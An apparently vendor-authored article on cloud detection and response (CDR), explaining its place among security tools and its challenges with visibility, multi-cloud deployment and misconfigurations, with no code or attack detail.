Detecting unexpected behavior in a cloud environment is often challenging due to the lack of instrumentation and the continual churn of devices and applications. Being able to separate legitimate attacks from everyday ‘noise’ is a critical function that must be developed when enterprises decide to leverage cloud environments.
Kick over a rock and you’ll find another detection and response solutions provider. From network (NDR), endpoint (EDR), and now XDR (the convergence of NDR and EDR), including SIEM and threat intelligence. Now, we have cloud detection and response (CDR), which focuses on, you guessed it, the cloud. CDR does not just provide detection and response solutions for cloud workloads; CDR enables security operations (SOC) teams to ensure the integrity of virtual machines (VM), containers, cloud APIs, and third-party applications.
Cloud Detection and Response (CDR) is one of the fastest-growing segments in cybersecurity due to the massive increase in the use of SaaS and public cloud services in the last few years. Nearly every organization has moved its business systems into operations to the cloud, including email, collaboration, sales, marketing, HR, and other business areas. Due to this transformation, cybersecurity teams must adapt to a radically different threat landscape in the cloud. One where there is very little control over the networks and security controls on which critical business systems run. Bad actors are increasingly deploying sophisticated attacks, including credential stuffing, social engineering, and spear phishing against users to gain access to resources in the cloud. For example, our team has been tracking nearly a 2X increase in attacks against cloud and SaaS providers from the same time last year, with Docker containers, Microsoft Azure, and Amazon Web Services (AWS) being the largest targets from threat actors such as TeamTNT and the 8220 Gang.
CDR is promising, but it comes with its challenges
Lack of visibility into third-party applications and environments. CDR solves a significant void in every enterprise infrastructure, especially if they support SaaS, PaaS, or IaaS solutions. However, controlling and gaining visibility into systems not operated by their in-house IT teams is challenging and cumbersome. Further, not having visibility into cloud environments and applications makes incident response and threat-hunting more difficult for security operations center (SOC) teams.
CDR solutions are difficult to deploy in multi-cloud environments. Most organizations are leveraging the benefits of multi-cloud environments to extend functionality and choices. Unfortunately, deploying in disparate cloud environments increases complexity, scalability, costs, and difficulty. Security in a multi-cloud environment is more complex than in a single cloud system. Teams must deploy consistent controls and security guidelines to ensure adequate visibility and prevent costly misconfigurations.
Difficulty monitoring and identifying cloud misconfigurations. The most common reasons for cloud data breaches are misconfiguration, stale credentials, and the inability to investigate and mitigate security incidents. Our research indicates the average cost of a non-cloud breach is between $4-5m per breach, whereas a cloud-based data breach is well over $7m, depending on the value of the information. While CDR is an effective approach to detecting and responding to incidents, more is needed to reduce threat signals from the noise coming from third-party providers.
Seeing is understanding
For CDR to be effective, SOC teams must have complete visibility to see the whole security incident story across the entire domain that integrates activity from containers, VMs, endpoints, and network data.
In many cases, CDR rounds out the detection and response solutions stack, but it has its challenges. Enterprises must have better visibility into what’s happening within their third-party services environments. CDR can help provide better line-of-sight into hosted applications, security controls, users, and privileges, as well as activity and security indicators to respond to alerts.